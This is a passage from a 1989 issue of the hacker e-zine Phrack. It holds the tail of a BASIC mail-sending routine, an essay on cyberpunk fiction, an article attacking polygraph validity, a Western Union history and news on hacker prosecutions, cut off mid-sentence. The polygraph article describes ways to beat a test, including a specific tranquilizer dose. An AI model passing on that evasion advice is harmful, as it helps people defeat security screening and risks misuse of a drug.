1 Mail_Recipients: IF TO_LIST( TO_COUNT ) = "" THEN GOTO End_Of_Line END IF STS = PUT_MSG( EDIT$( TO_LIST( TO_COUNT ) , 32 ) ) IF STS <> 0 THEN GOTO Error_Done END IF GOSUB Errchk IF LINK_ERR <> 0 THEN GOTO Error_Done END IF IF ( ERRSTS AND 1 ) = 0 THEN GOTO Error_Done END IF TO_COUNT = TO_COUNT + 1 GOTO Mail_Recipients END_OF_LINE: STS = PUT_MSG( CHR$(0) ) IF STS <> 0 THEN GOTO Error_Done END IF IF RECEIVERS = 0 THEN GOTO Mail_Done END IF STS = PUT_MSG( TO_SHOW ) IF STS <> 0 THEN GOTO Error_Done END IF STS = PUT_MSG( SUBJECT ) IF STS <> 0 THEN GOTO Error_Done END IF FOR I = 1 UNTIL TEXT(I) = CHR$(255) STS = PUT_MSG( TEXT(I) ) IF STS <> 0 THEN GOTO Error_Done END IF NEXT I STS = PUT_MSG( CHR$(0) ) IF STS <> 0 THEN GOTO Error_Done END IF SAVE_COUNT = RECEIVERS INDEX = 0 Delivery_Check: GOSUB Errchk IF LINK_ERR <> 0 THEN GOTO Error_Done END IF INDEX = INDEX + 1 IF INDEX <> SAVE_COUNT THEN GOTO Delivery_Check END IF GOTO Mail_Done Errchk: MAIL_STS = ASCII( GET_MSG ) IF LINK_ERR <> 0 THEN ERRSTS = LINK_ERR RETURN END IF IF ( MAIL_STS AND 1 ) = 1 THEN Receivers = Receivers + 1 ERRSTS = MAIL_STS RETURN END IF Errmsg: MAIL_ERR$ = GET_MSG IF LINK_ERR <> 0 THEN ERRSTS = LINK_ERR RETURN END IF IF LEN( MAIL_ERR$ ) <> 1 THEN PRINT MAIL_ERR$ GOTO Errmsg END IF IF ASCII( MAIL_ERR$ ) = 0 THEN RETURN ELSE GOTO Errmsg END IF DEF INTEGER PUT_MSG( STRING M ) ON ERROR GOTO 1550 MLEN = LEN( M ) MOVE TO # MAIL_CHANNEL , M = MLEN PUT # MAIL_CHANNEL, COUNT MLEN PUT_MSG = 0 EXIT DEF 1550 RESUME 1555 1555 PUT_MSG = ERR END DEF DEF STRING GET_INPUT( INTEGER C ) EOF = FALSE ON ERROR GOTO 1650 GET # C R = RECOUNT MOVE FROM #C , TEMP$ = R GET_INPUT = TEMP$ EXIT DEF 1650 RESUME 1655 1655 EOF = TRUE END DEF DEF STRING GET_MSG ON ERROR GOTO 1750 GET # MAIL_CHANNEL R = RECOUNT MOVE FROM # MAIL_CHANNEL , TEMP$ = R GET_MSG = TEMP$ LINK_ERR = 0 EXIT DEF 1750 RESUME 1755 LINK_ERR = ERR END DEF Mail_Net_Error: RESUME 1900 1900 PRINT "%Network communications error." Error_Done: Mail_Done: IF Net_Link_Open THEN CLOSE MAIL_CHANNEL END IF END SUB ***********************************CUT HERE************************************ _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #8 of 12 <<===========================================================>> << >> << Consensual Realities In Cyberspace >> << >> << by Paul Saffo >> << Personal Computing Magazine >> << >> << Copyright 1989 by the Association for Computing Machinery >> << >> <<===========================================================>> More often than we realize, reality conspires to imitate art. In the case of the computer virus reality, the art is "cyberpunk," a strangely compelling genre of science fiction that has gained a cult following among hackers operating on both sides of the law. Books with titles like "True Names," "Shockwave Rider," "Neuromancer," "Hard-wired," "Wetware," and "Mona Lisa Overdrive," are shaping the realities of many would-be viral adepts. Anyone trying to make sense of the social culture surrounding viruses should add the books to their reading list as well. Cyberpunk got its name only a few years ago, but the genre can be traced back to publication of John Brunner's "Shockwave Rider" in 1975. Inspired by Alvin Toffler's 1970 best-seller "Future Shock," Brunner paints a distopian world of the early 21st Century in which Toffler's most pessimistic visions have come to pass. Crime, pollution and poverty are rampant in overpopulated urban arcologies. An inconclusive nuclear exchange at the turn of the century has turned the arms race into a brain race. The novel's hero, Nickie Haflinger, is rescued from a poor and parentless childhood and enrolled in a top secret government think tank charged with training geniuses to work for a military-industrial Big Brother locked in a struggle for global political dominance. It is also a world certain to fulfill the wildest fantasies of a 1970s phone "phreak." A massive computerized data-net blankets North America, an electronic super highway leading to every computer and every last bit of data on every citizen and corporation in the country. Privacy is a thing of the past, and one's power and status is determined by his or her level of identity code. Haflinger turns out to be the ultimate phone phreak: he discovers the immorality of his governmental employers and escapes into society, relying on virtuoso computer skills (and a stolen transcendental access code) to rewrite his identity at will. After six years on the run and on the verge of a breakdown from input overload, he discovers a lost band of academic techno-libertarians who shelter him in their ecologically sound California commune and... well, you can guess the rest. Brunner's book became a best-seller and remains in print. It inspired a whole generation of hackers including, apparently, Robert Morris, Jr. of Cornell virus fame. The Los Angeles Times reported that Morris' mother identified "Shockwave Rider" as "her teen-age son's primer on computer viruses and one of the most tattered books in young Morris' room." Though "Shockwave Rider" does not use the term "virus," Haflinger's key skill was the ability to write "tapeworms" -- autonomous programs capable of infiltrating systems and surviving eradication attempts by reassembling themselves from viral bits of code hidden about in larger programs. Parallels between Morris' reality and Brunner's art is not lost on fans of cyberpunk: one junior high student I spoke with has both a dog-eared copy of the book, and a picture of Morris taped next to his computer. For him, Morris is at once something of a folk hero and a role model. In "Shockwave Rider," computer/human interactions occurred much as they do today: One logged in and relied on some combination of keyboard and screen to interact with the machines. In contrast, second generation cyberpunk offers more exotic and direct forms of interaction. Vernor Vinge's "True Names" was the first novel to hint at something deeper. In his story, and small band of hackers manage to transcend the limitations of keyboard and screen, and actually meet as presences in the network system. Vinge's work found an enthusiastic audience (including Marvin Minsky who wrote the afterword), but never achieved the sort of circulation enjoyed by Brunner. It would be another author, a virtual computer illiterate, who would put cyberpunk on the map. The author was William Gibson, who wrote "Neuromancer" in 1984 on a 1937 Hermes portable typewriter. Gone are keyboards; Gibson's characters jack directly into Cyberspace, "a consensual hallucination experienced daily by billions of legitimate operators... a graphic representation of data abstracted from the banks of every computer in the human system. Unthinkable complexity. Lines of light ranged in the nonspace of the mind, clusters and constellations of data..." Just as Brunner offered us a future of the 1970s run riot, Gibson's "Neuromancer" serves up the 1980s taken to their cultural and technological extreme. World power is in the hands of multinational "zaibatsu," battling for power much as mafia and yakuza gangs struggle for turf today. It is a world of organ transplants, biological computers and artificial intelligences. Like Brunner, it is a distopian vision of the future, but while Brunner evoked the hardness of technology, Gibson calls up the gritty decadence evoked in the movie "Bladerunner," or of the William Burroughs novel, "Naked Lunch" (alleged similarities between that novel and "Neuromancer" have triggered rumors that Gibson plagiarized Burroughs). Gibson's hero, Case, is a "deck cowboy," a freelance corporate thief-for-hire who projects his disembodied consciousness into the cyberspace matrix, penetrating corporate systems to steal data for his employers. It is a world that Ivan Boesky would understand: Corporate espionage and double-dealing has become so much the norm that Case's acts seem less illegal than profoundly ambiguous. This ambiguity offers an interesting counterpoint to current events. Much of the controversy over the Cornell virus swirls around the legal and ethical ambiguity of Morris' act. For every computer professional calling for Morris' head, another can be found praising him. It is an ambiguity that makes the very meaning of the word "hacker" a subject of frequent debate. Morris' apparently innocent error in no way matches the actions of Gibson's characters, but a whole new generation of aspiring hackers may be learning their code of ethics from Gibson's novels. "Neuromancer" won three of science fiction's most prestigious awards -- the Hugo, the Nebula and the Philip K. Dick Memorial Award -- and continues to be a best-seller today. Unambiguously illegal and harmful acts of computer piracy such as those alleged against Kevin Mitnick (arrested after a long and aggressive penetration of DEC's computers) would fit right into the "Neuromancer" story line. "Neuromancer" is the first book in a trilogy. In the second volume, "Count Zero" -- so-called after the code name of a character -- the cyberspace matrix becomes sentient. Typical of Gibson's literary elegance, this becomes apparent through an artist's version of the Turing test. Instead of holding an intelligent conversation with a human, a node of the matrix on an abandoned orbital factory begins making achingly beautiful and mysterious boxes -- a 21st Century version of the work of the late artist, Joseph Cornell. These works of art begin appearing in the terrestrial marketplace, and a young woman art dealer is hired by an unknown patron to track down the source. Her search intertwines with the fates of other characters, building to a conclusion equal to the vividness and suspense of "Neuromancer." The third book, "Mona Lisa Overdrive" answers many of the questions left hanging in the first book and further completes the details of the world created by Gibson including an adoption by the network of the personae of the pantheon of voodoo gods and goddesses, worshipped by 21st Century Rastafarian hackers. Hard core science fiction fans are notorious for identifying with the worlds portrayed in their favorite books. Visit any science fiction convention and you can encounter amidst the majority of quite normal participants, small minority of individuals who seem just a bit, well, strange. The stereotypes of individuals living out science fiction fantasies in introverted solitude has more than a slight basis in fact. Closet Dr. Whos or Warrior Monks from "Star Wars" are not uncommon in Silicon Valley; I was once startled to discover over lunch that a programmer holding a significant position in a prominent company considered herself to be a wizardess in the literal sense of the term. Identification with cyberpunk at this sort of level seems to be becoming more and more common. Warrior Monks may have trouble conjuring up Imperial Stormtroopers to do battle with, but aspiring deck jockeys can log into a variety of computer systems as invited or (if they are good enough) uninvited guests. One individual I spoke with explained that viruses held a special appeal to him because it offered a means of "leaving an active alter ego presence on the system even when I wasn't logged in." In short, it was the first step toward experiencing cyberspace. Gibson apparently is leaving cyberpunk behind, but the number of books in the genre continues to grow. Not mentioned here are a number of other authors such as Rudy Rucker (considered by many to be the father of cyberpunk) and Walter John Williams who offer similar visions of a future networked world inhabited by human/computer symbionts. In addition, at least one magazine, "Reality Hackers" (formerly "High Frontiers Magazine" of drug fame) is exploring the same general territory with a Chinese menu offering of tongue-in-cheek paranoia, ambient music reviews, cyberdelia (contributor Timothy Leary's term) and new age philosophy. The growing body of material is by no means inspiration for every aspiring digital alchemist. I am particularly struck by the "generation gap" in the computer community when it comes to "Neuromancer": Virtually every teenage hacker I spoke with has the book, but almost none of my friends over 30 have picked it up. Similarly, not every cyberpunk fan is a potential network criminal; plenty of people read detective thrillers without indulging in the desire to rob banks. But there is little doubt that a small minority of computer artists are finding cyberpunk an important inspiration in their efforts to create an exceedingly strange computer reality. Anyone seeking to understand how that reality is likely to come to pass would do well to pick up a cyberpunk novel or two. _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #9 of 12 ___________________________________ | | | The Truth About Lie Detectors | |_______ _______| | by Razor's Edge | | | | November 10, 1989 | |___________________| Americans love gadgets, so it is not hard to explain the popularity of the lie detector. Many people believe in the validity of lie detectors because the instruments and printouts resemble those used by doctors and others who collect scientific data and because lie detectors are simple, convenient shortcuts to hard complicated decisions. Polygraphy is fast becoming an American obsession -- an obsession, incidentally, not shared by the British or the Europeans or, as far as we know, the Russians. American industry's increasing dependence on the polygraph reflects an enormous faith in the rational processes of science. Each of us can recall a time when our voices sounded funny as we told a lie. Surely, if we can "hear" a lie, science can detect one. It comes as a disturbing shock, therefore, to learn how fragile the polygraph's scientific foundations really are. The roots of the lie detector, more formally known as the polygraph, go back to the turn of the century, when infatuation with the newly discovered powers of electricity more than once overcame common sense. But whereas electric hair restorers and high-voltage cancer cures have all but vanished, the polygraph persists and even flourishes. According to the best estimates, over one million polygraph examinations are administered each year in the united States. They are used in criminal investigations, during government security checks, and increasingly by nervous employers -- particularly banks and stores. In certain parts of the country, a woman must pass a lie detector test before the authorities will prosecute a rape. In 1983 the television show Lie Detector added the dimension of home entertainment to polygraph tests. The National Security Agency (NSA) leads the roster of federal polygraph users; both it and the CIA rely heavily on polygraph testing for pre-employment and routine security screening. The NSA reported giving nearly 10,000 tests in 1982 (CIA numbers are classified). Those who are labeled "deceptive" often lose their jobs, even if there is no actual evidence against them. Moreover, the polygraph report may become a permanent part of an employee's records, and it will be extremely difficult to compel a correction. With the arrest in June 1985 of four Navy men on espionage charges, the issue of using polygraphs to uncover spies or ferret out dishonest job seekers has come to the forefront of the debate about what should be done to stem the loss of defense and company secrets and to dispel potential thieves in the workplace. Much the same issue is at the heart of the protracted wrangle between the Reagan Administration and Congress over plans for expanded government use of the polygraph. An executive order issued on March 11, 1983, known as National Security Decision Directive 84, would have sanctioned for the first time "adverse consequences" for a federal employee who refuses to take a test when asked. The directive authorized tests to investigate candidates for certain security clearances and to ask any federal employee about leaks of classified information. (This directive was issued shortly after Reagan's comment about being "up to my keister" in press leads.) Almost simultaneously the Department of Defense (DOD) released a draft regulation that authorized use of the polygraph to screen employees who take on sensitive intelligence assignments; it, too, prescribed adverse consequences for refusal. Critics of the polygraph maintain that its use represents an invasion of privacy, especially when the coercive power of the government or an employer is behind the application. It is hard for a job applicant to say no when a prospective employer asks him or her to take a polygraph test; once hooked up to the machine, the applicant may face questions not only about past criminal activity but also about matters that an employer may have no business intruding upon, such as sexual practices or gambling -- questions asked ostensibly to assess the applicant's "character." As a result of such abuses, nineteen states and the District of Columbia have made it illegal for an organization to ask its employees to take polygraph examinations. A question more basic than whether the polygraph is an unacceptable invasion of privacy is, of course, whether it works. Seeking an answer in the scientific literature can be a bewildering experience. A report by the Office of Technology Assessment (OTA), commissioned in 1983 by Brooks's Committee on Government Operations, summed up the problem by citing twenty-four studies that found correct detection of guilt ranging from 35% to 100%. Polygraph theory thrives on a sort of Pinocchio vision of lying, in which physiological reactions -- changes in blood pressure or rate of breathing or sweating of the palms -- elicited by a set of questions will reliably betray falsehood. Lying, goes the rationale, is deliberate, and the knowledge and effort associated with it will make a person upset enough to display a physical reaction like a speedup of the heartbeat. The variables measured usually include the galvanic skin response (GSR), blood pressure, abdominal respiration, and thoracic respiration. The GSR is measured by fingertip electrodes that produce changes in the electrical resistance in the palms when they are sweating. The blood pressure and pulse are monitored through a system that uses a sphygmomanometer cuff, which is usually attached to the biceps (this is similar to the way doctors measure blood pressure). There is no "specific lie response." The polygraph merely records general emotional arousal. It does not distinguish anxiety or indignation from guilt. The real "lie detector" is the operator, who interprets the various body responses on the machine's output. Polygraphers claim that it is the form and mix of questions that are the keys to their success. The standard format, known as the Control Question Test, involves interspersing "relevant" questions with "control" questions. Relevant questions relate directly to the critical matter: "Did you participate in the robbery of the First National Bank on September 11, 1981?" Control questions, on the other hand, are less precise: "In the last twenty years, have you ever taken something that did not belong to you?" In the pretest interview, the polygrapher reviews all the questions and frames the control questions to produce "no" answers. It is in this crucial pretest phase that the polygrapher's deception comes into play, for he wants the innocent subject to dissemble while answering the control questions during the actual test. The assumption underlying the Control Question Test is that the truthful subject will display a stronger physiological reaction to the control questions, whereas a deceptive subject will react more strongly to the relevant questions. That is the heart of it. Modern lie detection relies on nothing more than subtle psychological techniques, crude physiological indicators, and skilled questioning and interpretation of the results. Critics claim that polygraphy fails to take the complexities of lying into account. For some people lying can be satisfying, fulfilling, exciting, and even humorous, depending on their reasons for lying. Other people feel little or no emotion when lying. Still others believe their lies and think they are telling the truth when they are not. Moreover, the theory holds that deception produces distinctive physiological changes that characterize lying and only lying. This notion has no empirical support. Quite the contrary: Lying produces no known distinctive pattern of physiological activity. Undeniably, when being dishonest, people can feel great turmoil and a polygraph can measure this turmoil. But when apprehensive about being interrogated, they can give a similar emotional reaction: When they think they are losing the chance for job openings or their jobs are on the line, when they reflect on the judgements that could be made about their answers, or, for that matter, when they are angry, puzzled, or even amused by the impertinent probing of a total stranger. Some control questions may make a person appear guilty. Such questions may force a subject into a minor lie or ask about an invented crime that nonetheless makes the subject nervous. Lie detectors are especially unreliable for truthful people. Many more innocent people test as "deceptive" than guilty people test as "innocent." Those who run a special risk include people who get upset if someone accuses them of something they didn't do, people with short tempers, people who tend to feel guilty anyway, and people not accustomed to having their word questioned. All of these feelings can change heart rate, breathing, and perspiration and their heightened feelings are easily confused with guilt. It has also been shown that polygraphs are easily manipulated. Four hundred milligrams of the tranquilizer meprobamate taken an hour or two before a polygraph session can make it virtually impossible to spot a liar by his physiological responses. In fact, some researchers even argue that an examinee can use simple countermeasures, such as biting one's tongue, gouging oneself with a fingernail, or stepping on a nail concealed in a shoe, to fake a strong reaction to the control questions, thus "beating" the test. According to one researcher, one prison inmate, who became the jail-house polygraph expert after studying the literature, trained twenty-seven fellow inmates in the seat techniques; twenty-three beat the polygraph tests used tons investigate violations of prison rules. However, do not try sighing, coughing, or clenching your fist or arm. Polygraphers usually are suspicious of those techniques and may label you "deceptive" for that reason alone. It should be obvious that the interpretation of the results of any polygraph test will certainly be very difficult. Also, not all responses on the machine will agree. What are the present qualifications for a polygrapher? Most of the twenty-five or more schools that train examiners provide only an eight-week course of instruction and require two years of college for admission. This is about one-sixth the study time of the average barber college. Perhaps as many as a dozendy time of contemporary polygraphers do hold Ph.D's, but the vast majority of the 4,000 to 8,000 practicing examiners had no simple significant training in physiology or in psychology, even though lie detection demands extremely subtle and difficult psychophysiological interpretations. There are no licensing standards for polygraph operators, and, with so many poorly, who trained operators, thousands of tests are conducted hastily and haphazardly, resulting in highly questionable accuracy. For many innocent people, their judge and jury are these unskilled operators. Honesty is also difficult to predict because it tends to be situation- specific. Therefore, it is more dependent on motivation and opportunity than on some personality trait. As Bertrand Russell once said, "Virtue is dictated by results of circumstance." Proponents of the polygraph sometimes cite "correct guilty detections": The percentage of guilty subjects who are caught by the polygraph. This figure can be very impressive: In one study that does not suffer from the failings already mentioned, it was 98% correct. But the same study found that 55% of innocent subjects were also diagnosed as "deceptive." The handful of studies that used a truly random selection of cases and scored them blind produced similar results: Overall, 83% of guilty subjects were diagnosed as "deceptive," as were 43% of innocent subjects. It's no trick to push the rate of correct guilty detections to 100% -- just call everyone "deceptive." You don't even need a machine to do that! Nature published its conclusions last year. Their aggregated findings were based on the polygraph charts of 207 criminal suspects, which 14 polygraphers scored independently. On the average, they erroneously diagnosed 43% of innocent suspects as deceptive. Such errors, called false positives, ranged as high as 50%. The corresponding errors of deceptive persons "passing the test," or false negatives, were as high as 36%. The accuracy rates of "failed" and "passed" depend, of course, on the proportion of dishonest persons in the group tested. Thus, if 800 of 1,000 persons tested are truthful, a test that is 72% accurate overall will accuse 144 liars and 224 truthful persons. This is not an impressive accuracy record. These numbers suggest that the polygraph test is biased against innocent people. The problem is accentuated when the test is used in the screening situations envisioned in the Reagan Administration proposals (and already established at the NSA and the CIA). Everyone is tested, but presumably only a very small proportion has done anything wrong. If we assume that one employee in a hundred is a spy (probably a gross overestimate), and if we use the 83% correct-guilty-detection rate, we find that 51 innocent persons will flunk the polygraph test for every real spy who flunks. Any test, whether it is for truth or for cancer, has to be extremely accurate to detect a rare phenomenon without setting off a lot of false alarms in the process. Even if the test were 99% accurate for both guilty and innocent detections, one innocent person would be falsely branded for each spy caught. Because of this "case rate" problem, the FBI forbids the use of polygraph dragnets: The tests can be used only after an initial investigation has narrowed the field of suspects. Given all the doubts about their validity, why does the government persist in using polygraph tests? Some clues are found in the DOD 1983 report on polygraph testing -- even in its title, "The Accuracy and Utility of Polygraph Testing" which suggests that accuracy and utility are two different things. The most that report concludes about accuracy is that it is "significantly above chance." Utility, however, is quite another matter. Perhaps the most telling statement about lie detectors comes from former president Nixon, who declared on one of the White House tapes, "I don't know anything about lie detectors other than they scare the hell out of people." _______________________________________________________________________________ ==Phrack Inc== Volume Three, Issue 30, File #10 of 12 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= === === === Western Union === === Telex, TWX, and Time Service === === === === by Phone Phanatic === === === === September 17, 1989 === === === =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= "Until a few years ago -- maybe ten -- it was very common to see TWX and Telex machines in almost every business place." There were only minor differences between Telex and TWX. The biggest difference was that the former was always run by Western Union, while the latter was run by the Bell System for a number of years. TWX literally meant "(T)ype(W)riter e(x)change," and it was Bell's answer to competition from Western Union. There were "three row" and "four row" machines, meaning the number of keys on the keyboard and how they were laid out. The "three row" machines were simply part of the regular phone network; that is, they could dial out and talk to another TWX also connected on regular phone lines. Eventually these were phased out in favor of "newer and more improved" machines with additional keys, as well as a paper tape reader attachment which allowed sending the same message repeatedly to many different machines. These "four row" machines were not on the regular phone network, but were assigned their own area codes (410-510-610-710-810-910) where they still remain today. The only way a four row machine could call a three row machine or vice-versa was through a gateway of sorts which translated some of the character set unique to each machine. Western Union's network was called Telex and in addition to being able to contact (by dial up) other similar machines, Telex could connect with TWX (and vice-versa) as well as all the Western Union public offices around the country. Until the late 1950's or early 1960's, every small town in America had a Western Union office. Big cities like Chicago had perhaps a dozen of them, and they used messengers to hand deliver telegrams around town. Telegrams could be placed in person at any public office, or could be called in to the nearest public office. By arrangement with most telcos, the Western Union office in town nearly always had the phone number 4321, later supplemented in automated exchanges with some prefix XXX-4321. Telegrams could be charged to your home phone bill (this is still the case in some communities) and from a coin phone, one did not ask for 4321, but rather, called the operator and asked for Western Union. This was necessary since once the telegram had been given verbally to the wire clerk, s/he in turn had to flash the hook and get your operator back on the line to tell them "collect five dollars and twenty cents" or whatever the cost was. Telegrams, like phone calls, could be sent collect or billed third party. If you had an account with Western Union, i.e. a Telex machine in your office, you could charge the calls there, but most likely you would simply send the telegram from there in the first place. Sometime in the early 1960's, Western Union filed suit against AT&T asking that they turn over their TWX business to them. They cited an earlier court ruling, circa 1950's, which said AT&T was prohibited from acquiring any more telephone operating companies except under certain conditions. The Supreme Court agreed with Western Union that "spoken messages" were the domain of Ma Bell, but "written messages" were the domain of Western Union. So Bell was required to divest itself of the TWX network, and Western Union has operated it since, although a few years ago they began phasing out the phrase "TWX" in favor of "Telex II"; their original device being "Telex I" of course. TWX still uses ten digit dialing with 610 (Canada) or 710/910 (USA) being the leading three digits. Apparently 410-510 have been abandoned; or at least they are used very little, and Bellcore has assigned 510 to the San Francisco area starting in a year or so. 410 still has some funny things on it, like the Western Union "Infomaster," which is a computer that functions like a gateway between Telex, TWX, EasyLink and some other stuff. Today, the Western Union network is but a skeleton of its former self. Now most of their messages are handled on dial up terminals connected to the public phone network. It has been estimated the TWX/Telex business is about fifty percent of what it was a decade ago, if that much. Then there was the Time Service, a neat thing which Western Union offered for over seventy years, until it was discontinued in the middle 1960's. The Time Service provided an important function in the days before alternating current was commonly available. For example, Chicago didn't have AC electricity until about 1945. Prior to that we used DC, or direct current. Well, to run an electric clock, you need 60 cycles AC current for obvious reasons, so prior to the conversion from DC power to AC power, electric wall clocks such as you see in every office were unheard of. How were people to tell the time of day accurately? Enter the Western Union clock. The Western Union, or "telegraph clock" was a spring driven wind up clock, but with a difference. The clocks were "perpetually self-winding," manufactured by the Self-Winding Clock Company of New York City. They had large batteries inside them, known as "telephone cells" which had a life of about ten years each. A mechanical contrivance in the clock would rotate as the clock spring unwound, and once each hour would cause two metal clips to contact for about ten seconds, which would pass juice to the little motor in the clock which in turn re-wound the main spring. The principle was the same as the battery operated clocks we see today. The battery does not actually run the clock -- direct current can't do that -- but it does power the tiny motor which re-winds the spring which actually drives the clock. The Western Union clocks came in various sizes and shapes, ranging from the smallest dials which were nine inches in diameter to the largest which were about eighteen inches in diameter. Some had sweep second hands; others did not. Some had a little red light bulb on the front which would flash. The typical model was about sixteen inches, and was found in offices, schools, transportation depots, radio station offices, and of course in the telegraph office itself. The one thing all the clocks had in common was their brown metal case and cream-colored face, with the insignia "Western Union" and their corporate logo in those days which was a bolt of electricity, sort of like a letter "Z" laying on its side. And in somewhat smaller print below, the words "Naval Observatory Time." The local clocks in an office or school or wherever were calibrated by a "master clock" (actually a sub-master) on the premises. Once an hour on the hour, the (sub) master clock would drop a metal contact for just a half second, and send about nine volts DC up the line to all the local clocks. They in turn had a "tolerance" of about two minutes on both sides of the hour so that the current coming to them would yank the minute hand exactly upright onto the twelve from either direction if the clock was fast or slow. The sub-master clocks in each building were in turn serviced by the master clock in town; usually this was the one in the telegraph office. Every hour on the half hour, the master clock in the telegraph office would throw current to the sub-masters, yanking them into synch as required. And as for the telegraph offices themselves, they were serviced twice a day by -- you guessed it -- the Naval Observatory Master clock in Our Nation's Capitol, by the same routine. Someone there would press half a dozen buttons at the same time, using all available fingers; current would flow to every telegraph office and synch all the master clocks in every community. Western Union charged fifty cents per month for the service, and tossed the clock in for free! Oh yes, there was an installation charge of about two dollars when you first had service (i.e. a clock) installed. The clocks were installed and maintained by the "clockman," a technician from Western Union who spent his day going around hanging new clocks, taking them out of service, changing batteries every few years for each clock, etc. What a panic it was for them when "war time" (what we now call Daylight Savings Time) came around each year! Wally, the guy who serviced all the clocks in downtown Chicago had to start on *Thursday* before the Sunday official changeover just to finish them all by *Tuesday* following. He would literally rush in an office, use his screwdriver to open the case, twirl the hour hand around one hour forward in the spring, (or eleven hours *forward* in the fall since the hands could not be moved backward beyond the twelve going counterclockwise), slam the case back on, screw it in, and move down the hall to the next clock and repeat the process. He could finish several dozen clocks per day, and usually the office assigned him a helper twice a year for these events. He said they never bothered to line the minute hand up just right, because it would have taken too long, and ".....anyway, as long as we got it within a minute or so, it would synch itself the next time the master clock sent a signal..." Working fast, it took a minute to a minute and a half to open the case, twirl the minute hand, put the case back on, "stop and b.s. with the receptionist for a couple seconds" and move along. The master clock sent its signal over regular telco phone lines. Usually it would terminate in the main office of whatever place it was, and the (sub) master there would take over at that point. Wally said it was very important to do a professional job of hanging the clock to begin with. It had to be level, and the pendulum had to be just right, otherwise the clock would gain or lose more time than could be accommodated in the hourly synching process. He said it was a very rare clock that actually was out by even a minute once an hour, let alone the two minutes of tolerance built into the gear works. "...Sometimes I would come to work on Monday morning, and find out in the office that the clock line had gone open Friday evening. So nobody all weekend got a signal. Usually I would go down a manhole and find it open someplace where one of the Bell guys messed it up, or took it off and never put it back on. To find out where it was open, someone in the office would 'ring out' the line; I'd go around downtown following the loop as we had it laid out, and keep listening on my headset for it. When I found the break or the open, I would tie it down again and the office would release the line; but then I had to go to all the clocks *before* that point and restart them, since the constant current from the office during the search had usually caused them to stop." But he said, time and again, the clocks were usually so well mounted and hung that "...it was rare we would find one so far out of synch that we had to adjust it manually. Usually the first signal to make it through once I repaired the circuit would yank everyone in town to make up for whatever they lost or gained over the weekend..." In 1965, Western Union decided to discontinue the Time Service. In a nostalgic letter to subscribers, they announced their decision to suspend operations at the end of the current month, but said "for old time's sake" anyone who had a clock was welcome to keep it and continue using it; there just would not be any setting signals from the master clocks any longer. Within a day or two of the official announcement, every Western Union clock in the Chicago area headquarters building was gone. The executives snatched them off the wall, and took them home for the day when they would have historical value. All the clocks in the telegraph offices disappeared about the same time, to be replaced with standard office-style electric wall clocks. _______________________________________________________________________________ ==Phrack Inc.== Volume Three, Issue 30, File #11 of 12 PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN P h r a c k W o r l d N e w s PWN PWN ~~~~~~~~~~~ ~~~~~~~~~ ~~~~~~~ PWN PWN Issue XXX/Part 1 PWN PWN PWN PWN Created, Written, and Edited PWN PWN by Knight Lightning PWN PWN PWN PWN Special Thanks to Dark OverLord PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN Happy Holidays and Welcome to Issue XXX of Phrack World News! This issue of Phrack World News contains stories and articles detailing events and other information concerning Acid Phreak, AT&T, Apple Computer Co., Bellcore, Bernie S., Klaus Brunnstein, Cap'n Crunch, Captain Crook, Chaos Communications Congress, Cheshire Catalyst, Clifford Stoll, CompuServe, Leonard Mitchell DiCicco, Emmanuel Goldstein, FCC, Katie Hafner, Harpers Magazine, Intellical, Michael Synergy, Kevin David Mitnick, Phiber Optik, Phonavision, Phrozen Ghost, Prime Suspect, Sir Francis Drake, Susan Thunder, Telenet, Terra, Tuc, Tymnet, The Well, and... Announcing the Fourth Annual... SummerCon '90 June 22-24, 1990 Saint Louis, Missouri This year's convention looks to be the more incredible than ever. Many of you will be hearing from us directly over the next few months about what will be taking place and where SummerCon '90 will be held specifically. The posted date is of course a tentative one (as we are still six months away), but any and all changes or new information will be in PWN and passed to our network friends. If you are thinking about attending SummerCon '90, please find a way to contact us as soon as possible. If you are not on the Internet or one of the public access Unix systems across the country, then post a message on bulletin boards that asks who is in contact with us. Chances are that there will be someone on there that can reach us. Knight Lightning / Forest Ranger / Taran King "A New Decade Is Upon Us... And The Future Never Looked Brighter!" _______________________________________________________________________________ Mitnick's Partner Gets Community Service November 29, 1989 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ By Kathy McDonald (New York Times) "Man Sentenced To Community Service For Helping Steal Computer Program" LOS ANGELES -- A federal judge has sentenced a 24-year-old suburban Calabasas man to community service at a homeless shelter for his role in helping computer hacker Kevin Mitnick steal a computer security program. In rejecting a sentencing report that suggested a prison term, U.S. District Judge Mariana Pfaelzer noted that Leonard Mitchell DiCicco had voluntarily notified authorities of the computer hacking. "I think you can do some good" in the community by using his computer skills productively, Pfaelzer told DiCicco. She sentenced DiCicco to five years of probation, during which he must complete 750 hours of community service through the Foundation for People, a Los Angeles group that matches probationers with community service projects. DiCicco was assigned to develop a computer system for the Anaheim Interfaith Shelter, said Frances Dohn, a foundation official. DiCicco also was ordered to pay $12,000 in restitution to Digital Equipment Corporation of Massachusetts, from which Mitnick stole a computer security program. Assistant U.S. Attorney James Asperger agreed with the community service sentence, saying DiCicco's cooperation had been crucial in the case against Mitnick. DiCicco reported Mitnick to DEC officers. Mitnick later admitted he stole the program and electronically brought it to California. DiCicco pleaded guilty in July to one count of aiding and abetting the interstate transportation of stolen property. He admitted that in 1987 he let Mitnick, age 25, of suburban Panorama City, use his office computer at Voluntary Plan Administrators in Calabasas to break into the DEC system. Mitnick pleaded guilty and was sentenced in July to one year in prison and six months in a community treatment program aimed at breaking his "addiction" to computer hacking. Under a plea bargain agreement with the government, DiCicco pleaded guilty in July in exchange for a promise that he would not be prosecuted for any of the other instances of computer hacking he and Mitnick carried out. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - If you are looking for other articles related to Leonard Mitchell DiCicco and the famous Kevin David Mitnick please refer to; "Pacific Bell Means Business" (10/06/88) PWN XXI....Part 1 "Dangerous Hacker Is Captured" (No Date ) PWN XXII...Part 1 "Ex-Computer Whiz Kid Held On New Fraud Counts" (12/16/88) PWN XXII...Part 1 "Dangerous Keyboard Artist" (12/20/88) PWN XXII...Part 1 "Armed With A Keyboard And Considered Dangerous" (12/28/88) PWN XXIII..Part 1 "Dark Side Hacker Seen As Electronic 